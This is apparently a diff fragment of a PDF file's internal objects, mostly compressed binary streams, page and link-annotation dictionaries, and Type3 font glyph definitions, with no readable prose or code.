¡ºIGk*·´nÌ›7»Ç`søòkï%qz»0Œd±Çå,åë–5ƒí˜·/7§f1hQÅÒÃÖ,Û5¸ª­k¦ÛüA§ë/ÿA^åi®ÌŒ–k81 øn"|U¬k"8€µÓiè t„¢vUÙ¤òˆ +mù}ˆâ˜¤5zj ÙÖ1²fÇSaêý0_ývy³¢ÆtñQö ÃP§Ëåt±úøScŠa3ß#Ûài3 o}_€²‘Ú8‡“T ¹6ŽÏÙ’Æ»³%öžüë üOçóÕG©TÒl¾Zœ]_Sç M].©1%…+1u9"¼šŸÜ\L—²ÿfyuy}¦‘ò5—n¢¿=aœ/nˆ¹œsdù15®êuŒÏM”/à—6oŠ­pz“¬àͤbQ\ör¤°mD˜g:‡6ðÆ3%è$U!¦‰2‘YLͦ»N#¸N0·;֤킗’ͦe´FæC¶ˆÇ€€Ø†§Î·íT¯uD0OÄÏ*ÑSCÑ߸«­;ðÍÑŠg5ÃLœ^S¦1…Ð tÊE*ˆìÈŠ¿ð9£wž}Ð`àp¹.¸¯¯²ª’¼;1œ…>f½˜Ú˜&mêòB©¬…jó9‰v!IEàm­[^ëV$•«"«éh`’K—ªÆ,}âLš¹ŽÒ5Ñà)äOÀÅ+Wí{[ìxDœÒé+Z{¶:ú6ŒÎ^ +endstream +endobj +921 0 obj << +/Type /Page +/Contents 922 0 R +/Resources 920 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 905 0 R +>> endobj +923 0 obj << +/D [921 0 R /XYZ 72 793.935 null] +>> endobj +354 0 obj << +/D [921 0 R /XYZ 72 545.742 null] +>> endobj +358 0 obj << +/D [921 0 R /XYZ 72 196.668 null] +>> endobj +920 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R /F20 406 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +928 0 obj << +/Length 339 +/Filter /FlateDecode +>> +stream +xÚ•OSÂ0Åïù{L›&ýot°Œ¨3(½!‡ŽÈLK¡ÔooJê U9xz;›—÷ö‡°„ ÙaA@äC¤‘ ­á¥"‹%Ba÷S@®t ï'W*Œ­–0'$ÉÈUê Ð\‡~Ù«Ë\˲4âÌ‹µ¢£Ãþ­nZ¶Ì¦W©Î~¨ æ¨läɯ±³ì³éö2Å¥ +ýÎìõnOI®”î;˜'âyqDͪG{ꢵžóPö‰i6ySÔÌ“RÒq^™Ò¸yÄNøà2XØ­¢Ïàz³;¬[; çôœÜ›¼pSaŽÌ¨)k&è–Ùbj«T@g“™3Ý™O7ÜŽ¯/ œ:%Å Ò`$1\ô‡ßBŠ˜GQè ÖMÝ–9³ýG×5ßçÕ6o.‘µî¹úÅ6îˆâŽh€£¾qÔ¿p’@ê(Éœ¡Þdä nçž2 +endstream +endobj +927 0 obj << +/Type /Page +/Contents 928 0 R +/Resources 926 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 905 0 R +/Annots [ 918 0 R 919 0 R 924 0 R 925 0 R ] +>> endobj +918 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [71.004 718.361 176.596 730.313] +/Subtype/Link/A<> +>> endobj +919 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [357.083 718.361 414.687 730.313] +/Subtype/Link/A<> +>> endobj +924 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [71.004 699.584 150.852 711.537] +/Subtype/Link/A<> +>> endobj +925 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [326.94 699.584 385.235 711.537] +/Subtype/Link/A<> +>> endobj +929 0 obj << +/D [927 0 R /XYZ 72 793.935 null] +>> endobj +362 0 obj << +/D [927 0 R /XYZ 72 760.449 null] +>> endobj +926 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F20 406 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +930 0 obj +[777.8 500 777.8] +endobj +931 0 obj +[500] +endobj +932 0 obj << /Length 281 /Filter /FlateDecode >> @@ -3948,7 +4551,7 @@ stream xÚuѽJÄ@à )Óì ;/pæ“Sç ¦ÎÊB¬ÔÒBQ¸BâÂv>‚Ïß$peŠ8;»çå¢n±»³ 3³Ù~vˆNœÄSLcLð.†GHºŽpšmb·0+ ¼Â4ðœøüôrálqŠ1„s¼Ž1ºbŽ‚VÞšÝë{MuPJ{µ oM”Â7´"Øâ5?ÐKŠûZØgcGý?ÒQýFö´vè¸>*jˆ¹Ìµh¹è]> @@ -3956,7 +4559,7 @@ stream xÚUϱjÃ@ `ZîB­'¨ã«S0Òâ¡ÐNB§¤c )-t³ÍâGðè!øz²3HôñKh{~\.hN™ í)'—Ó)Ã+º,ä9Çqs<ã¦Äôƒ\†é>Œ1-_éçû÷ ÓÍÛ …é–áæË-ÏÕÞ±wzð´¶L“Ô 73ˆnb¤. fV÷ c†éF ÓI, —m%‰¦‘¬5µ¤Ò€Ä+I¤¹IbM/1šNb5Ó'ë1UÞó…Wà®Äwüݦpt endstream endobj -803 0 obj << +934 0 obj << /Length 212 /Filter /FlateDecode >> @@ -3964,7 +4567,7 @@ stream xÚMÎ?ŠÂ@ðoH1ðš\@È»€Nbj£àº°)´²+µ´P´ $`‘No°g‰7ñ)S„dgFA›ï/ê÷¢ˆ}q7`Âo:PhŠ>‡Ãgg³§iLjÉaDêG—IÅ¿|:žw¤¦ó/HÍx°¿¦xÆ@@6/ïcGÇÄP‰Âà”¨!×Rˆ^!ª'“ÌâTH3=™â,ÑšÅæ×R˜;÷â…g¹X²Kž%Hs$h%Æ¢uõg·+> @@ -3972,7 +4575,7 @@ stream xÚMÏ¿ŠÂ@Çñ‘-¦Ù70óÞ&a…ÀÀ‚VWˆÕ¥…rWšGË£lgé–[„è¬QsŧùMó¾yK)¦!õêúJp©á1¦Á°¹|îpœ£þ Ô žóŒ:_Ð÷ág‹z¼œP‚zJë„â æS‚ º¶àÄŽÿÔ¬jußkÉÀzçäEª’¥òÌ «¬°Q)Ü]ÑÈx’îÄŽ/ÊÕ¬eQPú»¬xÏÑžc=þrÔ_ÇÁ»°0’%t£ÿÀà,ÇÞ!_‰ endstream endobj -805 0 obj << +936 0 obj << /Length 186 /Filter /FlateDecode >> @@ -3981,7 +4584,7 @@ x ‚PðOîœÅGð¼@]ÿ éb`955DS5¡öfö&>‚ã$»)5üÎð}œÃñü‘Ë6+X8!Cо¡ %j¡•P¦f•¢¶J`Rôò¢Ûþjµ×Ÿæ—­ùZzê FB”!Ì‚ž¥_©ºC4KhEoçM> endstream endobj -806 0 obj << +937 0 obj << /Length 237 /Filter /FlateDecode >> @@ -3991,7 +4594,7 @@ x ¿Ð6IõÔŸ—|ͬÁkÞ endstream endobj -807 0 obj << +938 0 obj << /Length 193 /Filter /FlateDecode >> @@ -4000,7 +4603,7 @@ x zãõG÷ãߨ IaévíÁU.R8Uk®èÏÍ ZÓ¢ B endstream endobj -808 0 obj << +939 0 obj << /Length 236 /Filter /FlateDecode >> @@ -4008,7 +4611,7 @@ stream xÚEοJ1ðY¶L“2/ Ù¸{ºÀy‚[Z]!Vz¥…¢ ({ûh_$°¹"¬Î,»ÚüŠI曯^ŸSE º5Žê=:|ÆzÉÓŠÍôôð„›íŽê%Ú+ž£m¯éõåmvssAí–îU÷Øn @ð‰ÉëE2 ÊȨ èž1½JàAE8èƒA‡b„räÈßg|¯FÆí‰Ã„äÌ d¾]¥ 2÷ÑG€d˜÷Æ3úKê–‚ú'Îè‘'BÇ¥„žx`:!s\ÁIŸ²`~zNx /[¼Å_¨TdW endstream endobj -809 0 obj << +940 0 obj << /Length 229 /Filter /FlateDecode >> @@ -4016,7 +4619,7 @@ stream xÚUϱJÄ@Ð7¤^“ò~@gãfa„ÅuSne!Vj)¬¢`•̧åS"þ@Ê-ÂÆûFaæ0Üa.wª³Óª’™,䤜NžJ~å¹Cˆøü÷æñ…W5Û;™;¶×ˆÙÖ7òþöñÌvu{)%۵ܗ2{àz-” DfJ £HŸGº„"|„Z¥ÑÖ¦ÁçÑԠÛ)ä€ò`ötfTvhÌ"Ã?|@‘×QZ×計VШó@0ã1ØE–Îã×¶-eý¶ƒÒƒ¯nOæ;`ëDŽhI|Uó†´éd" endstream endobj -810 0 obj << +941 0 obj << /Length 187 /Filter /FlateDecode >> @@ -4026,7 +4629,7 @@ xÚ… 9õ endstream endobj -811 0 obj << +942 0 obj << /Length 248 /Filter /FlateDecode >> @@ -4035,7 +4638,7 @@ x _ë|“XÙFlR,‰3…m¾â˜ÿ/ʽe4§Ýœög4/é6ÇG,r|ð{¹¹Çe…ö’ŠÚSŽÑVgôüôr‡vy~L9Ú]å”]cµ"Ð-€"ÀŒ4ÉÈ6"ñn"ja ‰g\ô ôê½… ßÃ}abZvL£ºRÈ´WÝ€î¸Wq‘þæÏz=Aè…æ³ã=AF­…Zp2Ǥ>}Ýþ±áÄm¼§ÿ1¾fxÔ‘0Sè!9„¦ƒTxRáþé^ñ endstream endobj -812 0 obj << +943 0 obj << /Length 172 /Filter /FlateDecode >> @@ -4045,7 +4648,7 @@ x ‚#˜BÐÊB¬ÔRPQH!š£å(9‚eŠÝÙµ¾êð”(E!¨/I )ÒtxA©M )»eÂ8E±!©Q,LF‘.év½QÄ«I m%…;L¿ð>?9›:À^ÖÓj¬šµœŠµ7óœ’ùNÁ‚ÿ÷Ö=¨»Öj •‘Av†G ¹Êç)®ñ ®E‡ endstream endobj -813 0 obj << +944 0 obj << /Length 266 /Filter /FlateDecode >> @@ -4054,7 +4657,7 @@ x èÙÿư`æ)ôÏaTzÄCY?›ô£´‰/C ÷EåîPÚÌ5¡„Û&„së~´¡„o eŸôs*ÁP%Äe-nÅ7ã7x` endstream endobj -814 0 obj << +945 0 obj << /Length 225 /Filter /FlateDecode >> @@ -4064,7 +4667,7 @@ x çëKºä7é¼S¹dÏâ蓺øù@7=æÊbTªEV´žÓŠUш?âI4›öà´õMÔÐâÚç;žØ@ê½A¯êmQSuj#Síêõ}7µ÷ÝÈ~Ô9ìÌÜ`^¹©ÀBË× è©¤ú’tUž endstream endobj -815 0 obj << +946 0 obj << /Length 190 /Filter /FlateDecode >> @@ -4075,7 +4678,7 @@ x ¡¥Y5"¡ÙÕ$*GE1À_ßkÐMŒAÛŽÌfb)­n!ê ¢Êa—!"„ºt¨5¾}€6)è•GÏ endstream endobj -816 0 obj << +947 0 obj << /Length 238 /Filter /FlateDecode >> @@ -4083,7 +4686,7 @@ stream xÚ]Ï¿NÃ0ð/Êé!÷Òš?"R)èÄ€˜ZF¤‚@ê€j?šyó=D ç¤$¶ôî|§Ïjr¢ŸÊ=.ÏYMxzÁ«’ÞH•]õlºo-_iVSñȪ¤âNêTÔ÷üñþùBÅìᆥ:ç'z¦zÎÈLfÜU¸ò›/à2¸k`£­¸Ö&[ˆ~‡ÜÀõ6bòÓùÝ‘Tƒ~4óЃ{ÚÎh{“FRýD“öJÎÊÈ*+o£Ft:‡^˶ñCØÆf\8ØŒ&‡†Ñôи%F–Ó¶öŸt[Ó‚~JlÓ endstream endobj -817 0 obj << +948 0 obj << /Length 209 /Filter /FlateDecode >> @@ -4091,7 +4694,7 @@ stream xÚEÎ?NÃ0ðgy°ô-9‚¿ €“˜¿K+•"‘ &ÄÔ22€`«šl‹%GðèÁ²± U†ßòÞðž½:m¹æk>i.ø¬e{ÉÛ†ÞÉ–´æsû_mÞhÕ‘ybÛ’¹Ë9™îž??¾^ɬn¸!³æç†ëêÖ x ô·ÆBþ`'#¼ˆ"“QMU1"èQ~9üéé{Hw” \„šfÕP3] ˃ú,a!ÒaZW}¾²‡p{EÌÂL~& ‡< ‘ÒxD·=Ò/´8bª endstream endobj -818 0 obj << +949 0 obj << /Length 182 /Filter /FlateDecode >> @@ -4102,7 +4705,7 @@ U: ¡ÃˆDòkgÌ%²- l©cdrE·ëý„,_ω#+h§‡ö( ò¯¿ ß0¬R‚GéC:k3•d¦V™ª4PÖ`  {@û1¼ÿ€¡gy9x–Ρoi|KãZ”Cf1.$nð ñÿ> @@ -4111,7 +4714,7 @@ x fìÔ¡tÒŽ…*:H|±é(V;Qû¬›X¶’¤\FjÓÛeý%E)æM“TÌ‚k1åRvûO1Åjª±˜™¾Ç}H9S Ü Á¹B†4øÅ7Z4^ë7^󝿬üð;r<×ÿŽÌȇ0È)¤ Êèz§»!ËB–e,; eá£__ß=Fʼ”W¹|/Hd endstream endobj -820 0 obj << +951 0 obj << /Length 178 /Filter /FlateDecode >> @@ -4120,7 +4723,7 @@ x Â@Ð )Óì„Ìt“MBÄ…Á-­,ÄJ-+³GËQr„”Bt ñóªÿá«|(¢œú1%Š2EûϨR.#Ê’ï²;baP®I¥(ç\£4 º^n”ÅrJ1Ê’61E[4%o!¨Aü™u4§x@ÕuŒ/øòØÓñYë¬qDówßûk;Ôp×pÒÐjh´WOü: ¬ðm 83¸Â7Ä¡B endstream endobj -821 0 obj << +952 0 obj << /Length 216 /Filter /FlateDecode >> @@ -4128,7 +4731,7 @@ stream xÚ5É1JÄ@†áo˜"ð;ÉMB¢™……uS,he!Vj)¬¢°•›x¥9ÊaÊ)Bp’ÍS¼oÓ\^]sÉ-_TÜ´\·üZÑÕëK®õù¼¼Ó¶£â‘ë5w1SÑíùëóûŠíý WTìø©âò™º##„M~!ÝJõ‰Ë&Ò ­zåt9FìaÆô¹õ¹u‘Þ"øYa€áÌ b&ÄõÏ9ã1¬ÄM¤‘J·°‘^-}´ð‰?Ÿ°9:o,”U ÛŽè;¢VF endstream endobj -419 0 obj << +507 0 obj << /Type /Font /Subtype /Type3 /Name /F27 @@ -4137,41 +4740,41 @@ endobj /Resources << /ProcSet [ /PDF /ImageB ] >> /FirstChar 28 /LastChar 117 -/Widths 822 0 R -/Encoding 823 0 R -/CharProcs 824 0 R +/Widths 953 0 R +/Encoding 954 0 R +/CharProcs 955 0 R >> endobj -822 0 obj +953 0 obj [46.68 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 59.42 0 0 0 0 0 0 0 0 0 0 0 0 42.44 38.2 38.2 42.44 38.2 0 38.2 42.44 25.46 0 38.2 21.22 67.91 46.68 42.44 42.44 38.2 35.01 33.95 27.59 44.56 ] endobj -823 0 obj << +954 0 obj << /Type /Encoding /Differences [28/a28 29/.notdef 84/a84 85/.notdef 97/a97/a98/a99/a100/a101 102/.notdef 103/a103/a104/a105 106/.notdef 107/a107/a108/a109/a110/a111/a112/a113/a114/a115/a116/a117] >> endobj -824 0 obj << -/a28 801 0 R -/a84 802 0 R -/a97 803 0 R -/a98 804 0 R -/a99 805 0 R -/a100 806 0 R -/a101 807 0 R -/a103 808 0 R -/a104 809 0 R -/a105 810 0 R -/a107 811 0 R -/a108 812 0 R -/a109 813 0 R -/a110 814 0 R -/a111 815 0 R -/a112 816 0 R -/a113 817 0 R -/a114 818 0 R -/a115 819 0 R -/a116 820 0 R -/a117 821 0 R +955 0 obj << +/a28 932 0 R +/a84 933 0 R +/a97 934 0 R +/a98 935 0 R +/a99 936 0 R +/a100 937 0 R +/a101 938 0 R +/a103 939 0 R +/a104 940 0 R +/a105 941 0 R +/a107 942 0 R +/a108 943 0 R +/a109 944 0 R +/a110 945 0 R +/a111 946 0 R +/a112 947 0 R +/a113 948 0 R +/a114 949 0 R +/a115 950 0 R +/a116 951 0 R +/a117 952 0 R >> endobj -825 0 obj << +956 0 obj << /Length 139 /Filter /FlateDecode >> @@ -4181,7 +4784,21 @@ x œÌL„X 1‚SZYH*µT´N–æRf SZˆß€Üî\?Ÿ:Ïœ3zK_°ð> +stream +xÚ3¶Ô32V0P0U06S06Q01SH1ä*ä2² +(Be’s¹œ<¹ôÃŒ,¸ô=€Â\úž¾ +%E¥©\úNÎ +†\ú. +ц +±\ž. +Œ°ÿaüÀÿùƒüööÿÏ?¨·ÿàÿÿ†?ìÿ~0ÿc(`øÁÀåêÉÈ 'N +endstream +endobj +958 0 obj << /Length 178 /Filter /FlateDecode >> @@ -4191,7 +4808,7 @@ xÚ ‡üî@- endstream endobj -827 0 obj << +959 0 obj << /Length 175 /Filter /FlateDecode >> @@ -4200,7 +4817,7 @@ xÚ… Â@E¿X¦Éœ èf²˜*#¸… •…¤RKAE[ÍÑr”Á2E0މ¨ðª?Ãÿ/ˆF~Àö ‡>o5IGzŽ»ËfO‰%µb‘šILÊÎù|ºìH%‹ kR)¯5{Ù”@<€¸åˆ ¸%œ;úB…^ ×–¸e¿q‹/NùŸßÿOI×Ùõׯ9•i ‘¥¦ÕIQ¥©¥%=¼p@ endstream endobj -828 0 obj << +960 0 obj << /Length 170 /Filter /FlateDecode >> @@ -4209,7 +4826,7 @@ x Â@Ð,Óxçî&!VBŒà‚Vb--­ÍÑ<ŠG°´ãþ,¿yów7çN­ṉ¹29‹³ÊçÊ8hNRy1[uVÌ2¨¿ÒëåvS­çš‰©u—©Ý‹¯@ò’4døfOàþ@ÒƒoO£W$tm$6IlBhöi{ãŒv#ò/‘»ˆÜ‘mbú¿· ”…—üáQ9î endstream endobj -829 0 obj << +961 0 obj << /Length 95 /Filter /FlateDecode >> @@ -4219,7 +4836,7 @@ x ¦P™ä\.'O.ýp3.} 0—¾§¯BIQi*—¾S€³‚!—¾‹B´¡‚A,—§‹BÅ2A—«'W Ó^J. endstream endobj -830 0 obj << +962 0 obj << /Length 169 /Filter /FlateDecode >> @@ -4228,7 +4845,7 @@ x Â@EGRÓxçîn&‚VBŒà‚Vb-­õhÅ#XZ„Äù& –7o?£ÓQªâ%³Ñ±d©_X½`tò_”'Î#»­¨g·4Ê.®äv½Ùåë¹v…ì‚ø=ÇBÎDTYjKó$z¼ˆ†¢Á—(1Øk¨…³w ûUaÂLºà †9pðȺ€Ð õh«»[p/"oø:^ endstream endobj -831 0 obj << +963 0 obj << /Length 112 /Filter /FlateDecode >> @@ -4238,7 +4855,7 @@ x @Q…h ¦X.O…úÿþÿÿCþ00 *ôÉy@§r¹zrr <^7 endstream endobj -832 0 obj << +964 0 obj << /Length 112 /Filter /FlateDecode >> @@ -4249,7 +4866,7 @@ x @Q…h žX.O…úÿþÿÿAõÿ00.TsØy¸\=¹¹°Û\K endstream endobj -833 0 obj << +965 0 obj << /Length 145 /Filter /FlateDecode >> @@ -4257,7 +4874,7 @@ stream xÚ3¶Ô32V0P0QÐ5S06U05RH1ä*ä26PAS ˆLr.—“'—~¸‚±—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓE¡€áÿâ ®b; ¶byn``à‡á ì ü€„?000‚0} @Œ! lÁåêÉÈp9e endstream endobj -834 0 obj << +966 0 obj << /Length 102 /Filter /FlateDecode >> @@ -4265,7 +4882,7 @@ stream xÚ3¶Ô32V0P0QÐ5W06UÐ5TH1ä*ä26PA3ˆDr.—“'—~¸‚±—¾‡‚—¾§¯BIQi*—¾S€³‚!—¾‹B´¡‚A,—§‹Býÿÿ?þÿÿÿƒÄ¸\=¹¹7 (n endstream endobj -835 0 obj << +967 0 obj << /Length 137 /Filter /FlateDecode >> @@ -4274,7 +4891,7 @@ x ¸\=¹¹ä¬+— endstream endobj -836 0 obj << +968 0 obj << /Length 159 /Filter /FlateDecode >> @@ -4287,7 +4904,7 @@ x ü ò Xq…|ãƒòíþË÷øÿ‡úÿÿØÿÿ€ÿÿæÿþc$’©©éé™Ë|Ý\®ž\\.¸Gg endstream endobj -837 0 obj << +969 0 obj << /Length 113 /Filter /FlateDecode >> @@ -4297,7 +4914,7 @@ x äë÷>K endstream endobj -838 0 obj << +970 0 obj << /Length 127 /Filter /FlateDecode >> @@ -4306,7 +4923,7 @@ x ¸\=¹¹dD( endstream endobj -839 0 obj << +971 0 obj << /Length 97 /Filter /FlateDecode >> @@ -4316,7 +4933,7 @@ x )†\…\@ ¡2ɹ\Nž\úá@.}0éé«PRTšÊ¥ïà¬`È¥ï¢m¨`Ëåé¢ ÇPßPßðÿ‚Ør \®ž\\-r" endstream endobj -840 0 obj << +972 0 obj << /Length 148 /Filter /FlateDecode >> @@ -4324,7 +4941,7 @@ stream xÚ3¶Ô32V0P0QÐ5S06U05RH1ä*ä26PAS ˆLr.—“'—~¸‚±—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEÁˆk øÿ```á Ì ü€„@0?700ȃ0P¹=ÛqqFÀ´ÓÇ0.b.WO®@.Ð`9e endstream endobj -841 0 obj << +973 0 obj << /Length 107 /Filter /FlateDecode >> @@ -4340,7 +4957,7 @@ x r õ õ ÿ@ ˆ-Ç€ `SËåêÉÈÃ7(b endstream endobj -842 0 obj << +974 0 obj << /Length 143 /Filter /FlateDecode >> @@ -4348,7 +4965,7 @@ stream xÚ3¶Ô32V0P04VÐ54P02W06RH1ä*ä2 (˜Áä’s¹œ<¹ôÃ|.} —¾§¯BIQi*—¾S€³‚!—¾‹B´¡‚A,—§‹?ƒýûõ ÄægÀÀjÔÂõ?ìÿãÆÌØÈ?¨?ð¿á?Ã?†.WO®@.xZ1° endstream endobj -843 0 obj << +975 0 obj << /Length 104 /Filter /FlateDecode >> @@ -4356,7 +4973,7 @@ stream xÚ3¶Ô32V0P0V04Q06S06RH1ä*äÒ@hh‘IÎåròäÒÊsé{…¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ìÿÿÿó 0èêAfp¹zrrQà8d endstream endobj -844 0 obj << +976 0 obj << /Length 136 /Filter /FlateDecode >> @@ -4365,7 +4982,7 @@ x ä~÷+î endstream endobj -845 0 obj << +977 0 obj << /Length 103 /Filter /FlateDecode >> @@ -4374,7 +4991,7 @@ x (˜B$’s¹œ<¹ôÌ̸ô=L¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]êÿÿoøÿÿÿñ¹\=¹¹t¡"é endstream endobj -846 0 obj << +978 0 obj << /Length 113 /Filter /FlateDecode >> @@ -4384,7 +5001,7 @@ x FF\ú@a.}O_…’¢ÒT.}§gC.}…hCƒX.O…†ÿÿàAþÕàB \®ž\\êÊ7; endstream endobj -847 0 obj << +979 0 obj << /Length 151 /Filter /FlateDecode >> @@ -4392,7 +5009,7 @@ stream xÚ3¶Ô32V0Pc33…C®B.c# ßÄI$çr9yré‡+qé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]d0Ø1?À‰ëØ0Ô°€áúÿÿÿýG >ÃþtÌøC¾ñƒ<6ŒÍ æv 0Ìþ Žý@ NÌÜ`ÁÀåêÉÈj‹ch endstream endobj -848 0 obj << +980 0 obj << /Length 234 /Filter /FlateDecode >> @@ -4400,7 +5017,7 @@ stream xÚm±jA†'X Lã#ܼ€Ù;×­Ô€WI•"¤2)Óž¯µÇ)ó^—öºlq85!aøø‡ývÆo»–Cîq§Ï6æ¸Ë/­È†|ªxp™Ì4JÉ<² ÉL5&“Îx³~{%3ºsDfÂO‡Ï”NZ;t j9BKd‡".©‚ÏCìßýKŸaát?Sü¢™?¢[æêÈ÷q(mñ€?>sPiP~(¥ ?PW¦èûìšæÒõßÂçXžv¨“/ÝG=mõ©n¤HªÿoÑé.¥úH‚Ê endstream endobj -849 0 obj << +981 0 obj << /Length 213 /Filter /FlateDecode >> @@ -4409,7 +5026,7 @@ x $¨(ÐV@‰ÚoÂU|Á¥‘¢„Œ¦øšÿé…ëË>pË/öö¼ëùµÃO ý[Þ]éòòއý‡ýÝ–Ñ÷üýõó†þðpÃú#?wÜžp<2|¸uHM²0¢¬Å–¿b³"‘”Kkqqʃ1¤ \<Á³jDUF+²"‘œˆj &(pÞ΋™a¶‹hD¥ÕTú5EY‘eZ)Ùʼn(ÌL±© àíˆø:äm endstream endobj -850 0 obj << +982 0 obj << /Length 208 /Filter /FlateDecode >> @@ -4418,7 +5035,7 @@ x Â@†gI˜&7pçn"Øð¦´²+µ´P´“£íQr„Ø¥XvœÕÞâ/æÁ÷Åd˜”Ò7cé”á‹\æ4Œáp¼à¬B³£"G³’-šjM÷ÛãŒf¶™S†fAûŒÒV åbn@³…š[`îG}äTwà’V?[{ݰ׊}±ŸÆo~Å-‡Ã3iʧ›²× ÿ%üÈïôû†–f/ìN:ZAZéHw9¨Å…ÅÉ‹›ÇN\-(\V¸Å\d[ endstream endobj -851 0 obj << +983 0 obj << /Length 247 /Filter /FlateDecode >> @@ -4427,7 +5044,7 @@ x ú@8 ‚q!ñŒ1môhÜÚrë*f†Š[˲gd䪼ªñÀu$ endstream endobj -852 0 obj << +984 0 obj << /Length 175 /Filter /FlateDecode >> @@ -4439,7 +5056,7 @@ A+ HðÑ}Õ}ÕFµñZ <cðBz3ÿM÷K‹‚6ô?ŒB: endstream endobj -853 0 obj << +985 0 obj << /Length 175 /Filter /FlateDecode >> @@ -4448,7 +5065,7 @@ x ä½¼]u endstream endobj -854 0 obj << +986 0 obj << /Length 181 /Filter /FlateDecode >> @@ -4456,7 +5073,7 @@ stream xÚ}ϱ‚0à“[xî ,XBâd‚˜ØÁD'㤎])ÖGáçÜú¥wmÿôÌr¾0aÌˤ˜¤xá&á:’R.wÈ,è#šô–» í_Ï÷ t¶_c :Çß<ƒÍÑ)ED^¨„¯r¬šÖŒj„BpÂj”b îŽ"ú~ص½|—\2á@àÇ}¯}&’72BÝÍÑNĽRÁÆÂ~‰t› endstream endobj -855 0 obj << +987 0 obj << /Length 194 /Filter /FlateDecode >> @@ -4466,7 +5083,7 @@ xÚ Èäv+ ´4ÒTK[%¥´à1H;àÒàß0)P7 endstream endobj -856 0 obj << +988 0 obj << /Length 173 /Filter /FlateDecode >> @@ -4474,7 +5091,7 @@ stream xÚ3¶Ô32V0P0bc33…C®B.c ßÄI$çr9yré‡+›pé{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]êÿÿa`¨ÿÿŸáÿÿÿ@¬ âûþ@‚D0þ ÿàDˆ¨ö`¢HÈ£€?yšQ`ãíá¶Õ£¸ì4æç‚öÌ3 ¿=ÈåêÉÈ+QlV endstream endobj -857 0 obj << +989 0 obj << /Length 148 /Filter /FlateDecode >> @@ -4482,7 +5099,7 @@ stream xÚ3¶Ô32V0P0bcs3…C®B.cS ßÄI$çr9yré‡+›ré{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]êÿÿÿßÄÿ Øö üx ö ÁÀ€A°7 þÈÐ8ìš:ˆ^l†20ƒ­|€Ÿ9üÁTì.WO®@.²“{y endstream endobj -858 0 obj << +990 0 obj << /Length 146 /Filter /FlateDecode >> @@ -4490,7 +5107,7 @@ stream xÚ3¶Ô32V0P0bcs3…C®B.c ßÄI$çr9yré‡+›pé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]êÿÿÿßÄÿ Øö üx ö ÁÀ€A°7 þÈÐ8ìš:ˆ^l†GÔÿo``ŒD€Å¸\=¹¹’pio endstream endobj -859 0 obj << +991 0 obj << /Length 198 /Filter /FlateDecode >> @@ -4500,7 +5117,7 @@ xÚ F”d¯f{ÀB"_‘Èg&F.çt>]öȋńbä%­cŠ6(K‚àž0uh´Ðž…¯˜2e¨ ¼¯€užAk;¼Q£²°÷¿`ÚþÑíµÍêßÏ9x=Ú^ƒY+§æ$®wÜhʬÀÔ8•¸Ä'êcê endstream endobj -860 0 obj << +992 0 obj << /Length 121 /Filter /FlateDecode >> @@ -4508,7 +5125,7 @@ stream xÚ3¶Ô32V0P0bc 3…C®B.c3 ßÄI$çr9yré‡+›qé{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]êÿ±ÿðÿ?ÿÿ,Æþ€¡ŽJÄÿÿÿ°T´Dàô —«'W ¡ qs endstream endobj -861 0 obj << +993 0 obj << /Length 109 /Filter /FlateDecode >> @@ -4516,7 +5133,7 @@ stream xÚ3¶Ô32V0P0bc3…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]êÿÿðÿÿÿ0 â3È70 &ŒÍ\®ž\\â×M endstream endobj -862 0 obj << +994 0 obj << /Length 136 /Filter /FlateDecode >> @@ -4524,7 +5141,7 @@ stream xÚ3¶Ô32V0P0UÐ5T06S01SH1ä*ä26PAsˆLr.—“'—~¸‚±—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ –ËÓEAþÿûÿàÄgo\ÅÿàØžáC=C}#üÿî<öÿþ30p¹zrrù•Cb endstream endobj -863 0 obj << +995 0 obj << /Length 216 /Filter /FlateDecode >> @@ -4533,7 +5150,7 @@ x 8™SžsÊý7”5è/4sÐïT]oðr¾A—k,@W¸¥ÉÔ¶^…ޱaLƒ•HjÊÆC¤l"ô„rDj‰LèˆUD4ÌÈxâ6÷žøñÇÑ?7‚Às#ãù®%~ªÏÇ/»´›~Svú> @@ -4541,7 +5158,7 @@ stream xÚ3¶Ô32V0P0bc33…C®B.c ßÄI$çr9yré‡+›pé{E¹ô=}JŠJS¹ôœ ¹ô]¢*c¹<]êÿ``¨ÿÿ€á?ˆ¨‡@1æ ƒ‰`oüðõÿÿÿ‡ÿá,ÑÀåêÉÈÇÕ[ endstream endobj -865 0 obj << +997 0 obj << /Length 173 /Filter /FlateDecode >> @@ -4550,7 +5167,7 @@ x äBëb endstream endobj -866 0 obj << +998 0 obj << /Length 183 /Filter /FlateDecode >> @@ -4559,7 +5176,7 @@ x qà*Q"jà„ ˆ°ƒr BDð£ìûPæ @‡ÿcøÿL0B‰ú? ¸\=¹¹hA endstream endobj -867 0 obj << +999 0 obj << /Length 157 /Filter /FlateDecode >> @@ -4567,7 +5184,7 @@ stream xÚ3¶Ô32V0P0QÐ5T06U01WH1ä*ä26PA ˆLr.—“'—~¸‚±—¾P˜KßÓW¡¤¨4•Kß)ÀYÁKßE!ÚPÁ 